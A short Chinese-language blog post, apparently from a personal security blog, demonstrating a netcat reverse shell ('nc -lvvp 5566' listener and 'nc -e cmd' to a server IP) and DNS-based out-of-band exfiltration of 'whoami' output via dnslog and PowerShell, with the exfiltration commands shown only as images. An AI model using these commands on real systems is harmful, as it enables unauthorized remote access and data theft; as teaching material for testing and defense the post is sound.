JOJO朦

H4ckBu7eer

反弹shell&&带外查询

这里只做简单演示

    一.反弹shell

使用的到的都是Windows所以这里用的是nc,Linux上是ncat。

使用xshell连接到Windows服务器输入nc -lvvp 5566进行监听,然后打开自己Windows上的cmd输入nc -e  cmd 服务器IP 5566将权限给到服务器,这里可能需要对防火墙进行设置一下。

    二.数据外带

这里需要使用dnslog,点击image.png获取到地址。

在电脑上打开powershell,为什么不用到cmd,因为这里需要使用到powershell的赋值特性。

image.png

这里ping成功了,之后返回到dnslog点击image.png

image.png

很清楚的看到whoami的信息被带出来了。

  • 评论列表:

发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言